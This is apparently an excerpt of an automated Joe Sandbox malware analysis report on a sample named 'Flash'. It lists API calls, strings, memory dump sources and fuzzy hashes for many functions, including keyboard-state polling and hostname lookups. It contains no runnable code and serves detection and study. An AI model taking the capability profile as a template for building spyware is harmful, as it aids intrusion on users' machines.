                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: 3df1e03f70674296a105630638b503b75b19bf2ec4d5d76a1f3d4c1f5a0448d4
                                                        • Instruction ID: 367897b56a9a56b7ff10bdbc8a8322f752fa5acebf20ff6df0314ac083254b76
                                                        • Opcode Fuzzy Hash: 3df1e03f70674296a105630638b503b75b19bf2ec4d5d76a1f3d4c1f5a0448d4
                                                        • Instruction Fuzzy Hash: B7116031950269B9D721B7A6DC5AEFF6B7CFBD1B50F400829B411A61D1DE701D44CAB0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 313f09baffa044aab586a090adfde7408331ecef245afe1a5ab517c1e72feb00
                                                        • Instruction ID: ceff2211a7cdbb31a927f07b3b42f40f829784ae6b89384443380e409231aa6f
                                                        • Opcode Fuzzy Hash: 313f09baffa044aab586a090adfde7408331ecef245afe1a5ab517c1e72feb00
                                                        • Instruction Fuzzy Hash: 4B11E432905109AFDB11EB609C4AFEB77BCDF85710F0401A5F14496091EFB0ADC28BA0
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00A35535
                                                          • Part of subcall function 009F0859: timeGetTime.WINMM(?,00000002,009DC22C), ref: 009F085D
                                                        • Sleep.KERNEL32(0000000A), ref: 00A35561
                                                        • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00A35585
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A355A7
                                                        • SetActiveWindow.USER32 ref: 00A355C6
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A355D4
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A355F3
                                                        • Sleep.KERNEL32(000000FA), ref: 00A355FE
                                                        • IsWindow.USER32 ref: 00A3560A
                                                        • EndDialog.USER32(00000000), ref: 00A3561B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 379c7345a4e941bc7d4feb64501fde7407fca3a2cf6aa42ead9be8f54c578c03
                                                        • Instruction ID: 68428e376b565f880b3f9e9bd4d7abbc78af75df211bbb8a080f1a71573d0ca7
                                                        • Opcode Fuzzy Hash: 379c7345a4e941bc7d4feb64501fde7407fca3a2cf6aa42ead9be8f54c578c03
                                                        • Instruction Fuzzy Hash: 9121BBB0604644AFEB41DFF8EDC9E2A3B7AEB46344F05141AF002811A1DFB1DC969A32
                                                        APIs
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                        • CoInitialize.OLE32(00000000), ref: 00A3DC2D
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A3DCC0
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00A3DCD4
                                                        • CoCreateInstance.OLE32(00A63D4C,00000000,00000001,00A8B86C,?), ref: 00A3DD20
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A3DD8F
                                                        • CoTaskMemFree.OLE32(?,?), ref: 00A3DDE7
                                                        • _memset.LIBCMT ref: 00A3DE24
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00A3DE60
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A3DE83
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00A3DE8A
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A3DEC1
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00A3DEC3
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: 7195b0a2529c966fe0796706ff13be621a8e2cd5cfd48b796c4fd397f8b05c10
                                                        • Instruction ID: ca12ac8c81ce4a9362f7cf12940e5c92ec3d269d228eac65a5f69b0df1bdfa67
                                                        • Opcode Fuzzy Hash: 7195b0a2529c966fe0796706ff13be621a8e2cd5cfd48b796c4fd397f8b05c10
                                                        • Instruction Fuzzy Hash: AEB1C875A00119EFDB14DFA4D888EAEBBB9EF88304F148459F905EB261DB70EE45CB50
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00A30896
                                                        • SetKeyboardState.USER32(?), ref: 00A30901
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00A30921
                                                        • GetKeyState.USER32(000000A0), ref: 00A30938
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00A30967
                                                        • GetKeyState.USER32(000000A1), ref: 00A30978
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00A309A4
                                                        • GetKeyState.USER32(00000011), ref: 00A309B2
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00A309DB
                                                        • GetKeyState.USER32(00000012), ref: 00A309E9
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00A30A12
                                                        • GetKeyState.USER32(0000005B), ref: 00A30A20
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 159466e480e8cac86e81fb8c1cdf0951dfde1ab34726f5245cd7c32142ec5ee1
                                                        • Instruction ID: 8df52585deac8586d1f204ea4d98ecd18ea05bb3ca43e5a0fffff33147c14223
                                                        • Opcode Fuzzy Hash: 159466e480e8cac86e81fb8c1cdf0951dfde1ab34726f5245cd7c32142ec5ee1
                                                        • Instruction Fuzzy Hash: 2351BC7090478829FB35DBB04525FEABFB49F01780F08859DE5C2575C3DA649A4CCBA6
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 00A2CE1C
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A2CE2E
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00A2CE8C
                                                        • GetDlgItem.USER32(?,00000002), ref: 00A2CE97
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A2CEA9
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00A2CEFD
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A2CF0B
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A2CF1C
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00A2CF5F
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00A2CF6D
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A2CF8A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00A2CF97
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: d9a0df477c78d79133fcb4277b403647a5a61db0894f4821825d9d048e7c0003
                                                        • Instruction ID: 04cfad17f40bcef5c79878db8e4cb5ab99b6f29ee3897a00dd578665232977cc
                                                        • Opcode Fuzzy Hash: d9a0df477c78d79133fcb4277b403647a5a61db0894f4821825d9d048e7c0003
                                                        • Instruction Fuzzy Hash: 18515371B00205AFDB18CFACDD85EAEBBB6EB88710F14812DF516D7290D7B0AD418B50
                                                        APIs
                                                          • Part of subcall function 009D1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009D2412,?,00000000,?,?,?,?,009D1AA7,00000000,?), ref: 009D1F76
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009D24AF
                                                        • KillTimer.USER32(-00000001,?,?,?,?,009D1AA7,00000000,?,?,009D1EBE,?,?), ref: 009D254A
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00A0BFE7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009D1AA7,00000000,?,?,009D1EBE,?,?), ref: 00A0C018
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009D1AA7,00000000,?,?,009D1EBE,?,?), ref: 00A0C02F
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009D1AA7,00000000,?,?,009D1EBE,?,?), ref: 00A0C04B
                                                        • DeleteObject.GDI32(00000000), ref: 00A0C05D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: a00ce4d6fe9be0a57735632c3a1127fedeee6999742415158e37b25c7d139c40
                                                        • Instruction ID: 58920be9f42c8e1e0509d9ead7c9dd2aae71860a2eb793513c90a6ca23ca2e35
                                                        • Opcode Fuzzy Hash: a00ce4d6fe9be0a57735632c3a1127fedeee6999742415158e37b25c7d139c40
                                                        • Instruction Fuzzy Hash: D261AF31254605DFDB25DF94E948B2AB7F1FF50312F10CA1AE44257AB0C775A892DFA0
                                                        APIs
                                                          • Part of subcall function 009D29AB: GetWindowLongW.USER32(?,000000EB), ref: 009D29BC
                                                        • GetSysColor.USER32(0000000F), ref: 009D25AF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: 71bda0540794d769d0faa3c2e3deabc66436fdad72b90d25af55d9608b5ab5b0
                                                        • Instruction ID: 713812c6520148efd30291b62f476ba67986aa1f3e588929ef654ab8fc9ff765
                                                        • Opcode Fuzzy Hash: 71bda0540794d769d0faa3c2e3deabc66436fdad72b90d25af55d9608b5ab5b0
                                                        • Instruction Fuzzy Hash: DD41B731144244AFDB219F689888FB93765EB2A331F548363FD668A2E5D7708C82DB21
                                                        APIs
                                                          • Part of subcall function 009F0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,009E2A3E,?,00008000), ref: 009F0BA7
                                                          • Part of subcall function 009F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009E2A58,?,00008000), ref: 009F02A4
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 009E2ADF
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009E2C2C
                                                          • Part of subcall function 009E3EBE: _wcscpy.LIBCMT ref: 009E3EF6
                                                          • Part of subcall function 009F386D: _iswctype.LIBCMT ref: 009F3875
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-3738523708
                                                        • Opcode ID: 1c2ac44ee3df9499d5f9eb3b688f2a11fcf211158ba831009cc91823abdc99f5
                                                        • Instruction ID: d15f46d286937fab9ebb71cd79bd237b6089553b63ca6b7cb98e23e239e847f6
                                                        • Opcode Fuzzy Hash: 1c2ac44ee3df9499d5f9eb3b688f2a11fcf211158ba831009cc91823abdc99f5
                                                        • Instruction Fuzzy Hash: 4002AE301083819FC725EF25C941AAFBBE9AFD9354F14492DF599932A2DB30DD89CB42
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,00A60980), ref: 00A3AF4E
                                                        • GetDriveTypeW.KERNEL32(00000061,00A8B5F0,00000061), ref: 00A3B018
                                                        • _wcscpy.LIBCMT ref: 00A3B042
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: a62a3006c9541960f53704cf103b09f23450a00ae50ce32af4a0ae13841b7783
                                                        • Instruction ID: c211db3e6a8b5c9fbe32929e881d51ab19021ba6e137d8843a37397dbafe99fd
                                                        • Opcode Fuzzy Hash: a62a3006c9541960f53704cf103b09f23450a00ae50ce32af4a0ae13841b7783
                                                        • Instruction Fuzzy Hash: 19519B701583159BC314EF14C892BABB7AAEFD4700F50882DF596572E2EB71AD09CB62
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __i64tow__itow__swprintf
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 421087845-2263619337
                                                        • Opcode ID: 14bbf3803d51f93f9834ba536c06feafb00f087b1256bbed6876d056704aec1e
                                                        • Instruction ID: a89dea40dc555ea789c2b124636c7f1e4783b877da707f0c699c0c3152b35326
                                                        • Opcode Fuzzy Hash: 14bbf3803d51f93f9834ba536c06feafb00f087b1256bbed6876d056704aec1e
                                                        • Instruction Fuzzy Hash: B641C57264420DAFDB24DF74D842F7A73E9EB85340F20886EE149DB2D2EA35A941CB11
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A5778F
                                                        • CreateMenu.USER32 ref: 00A577AA
                                                        • SetMenu.USER32(?,00000000), ref: 00A577B9
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A57846
                                                        • IsMenu.USER32(?), ref: 00A5785C
                                                        • CreatePopupMenu.USER32 ref: 00A57866
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A57893
                                                        • DrawMenuBar.USER32 ref: 00A5789B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$F
                                                        • API String ID: 176399719-3044882817
                                                        • Opcode ID: 6fceeabe7c63c25defa292542bfe0bf7b00a9a7aa114135a63bf9fdb9421b1ca
                                                        • Instruction ID: 44ae1a7151898dec34ac522dae656cc9c55632ebedc46c8eaaabdc08510625ed
                                                        • Opcode Fuzzy Hash: 6fceeabe7c63c25defa292542bfe0bf7b00a9a7aa114135a63bf9fdb9421b1ca
                                                        • Instruction Fuzzy Hash: 8F414774A00209EFDB10DFA4E888E9ABBB5FF49311F184429FD46A7360D770A955CF60
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A57B83
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00A57B8A
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A57B9D
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A57BA5
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A57BB0
                                                        • DeleteDC.GDI32(00000000), ref: 00A57BB9
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00A57BC3
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A57BD7
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A57BE3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: ef2ad0dc56b472f7842115183f27b9eab8920735aa038c03e3975bd1482393cb
                                                        • Instruction ID: ead90622b04d9a9c0606c6bbe032efa16cc07967387ff1f41f3d404d2f42bac9
                                                        • Opcode Fuzzy Hash: ef2ad0dc56b472f7842115183f27b9eab8920735aa038c03e3975bd1482393cb
                                                        • Instruction Fuzzy Hash: FA318A32104218ABDF129FA4EC49FDF3B79FF09321F110215FA16A61A0C7B1D865DBA4
                                                        APIs
                                                        • _memset.LIBCMT ref: 009F706B
                                                          • Part of subcall function 009F8D58: __getptd_noexit.LIBCMT ref: 009F8D58
                                                        • __gmtime64_s.LIBCMT ref: 009F7104
                                                        • __gmtime64_s.LIBCMT ref: 009F713A
                                                        • __gmtime64_s.LIBCMT ref: 009F7157
                                                        • __allrem.LIBCMT ref: 009F71AD
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F71C9
                                                        • __allrem.LIBCMT ref: 009F71E0
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F71FE
                                                        • __allrem.LIBCMT ref: 009F7215
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F7233
                                                        • __invoke_watson.LIBCMT ref: 009F72A4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                        • Instruction ID: b50c748c5eee3f1fdfa16526c1545a2034bb4d2e0fbe581a63079c03a9d878eb
                                                        • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                        • Instruction Fuzzy Hash: CF71D972A0471FABE7149EB9DC41BBAF3ADAF54320F144229F614E72C1EB70D9548790
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A32CE9
                                                        • GetMenuItemInfoW.USER32(00A97890,000000FF,00000000,00000030), ref: 00A32D4A
                                                        • SetMenuItemInfoW.USER32(00A97890,00000004,00000000,00000030), ref: 00A32D80
                                                        • Sleep.KERNEL32(000001F4), ref: 00A32D92
                                                        • GetMenuItemCount.USER32(?), ref: 00A32DD6
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00A32DF2
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00A32E1C
                                                        • GetMenuItemID.USER32(?,?), ref: 00A32E61
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A32EA7
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A32EBB
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A32EDC
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
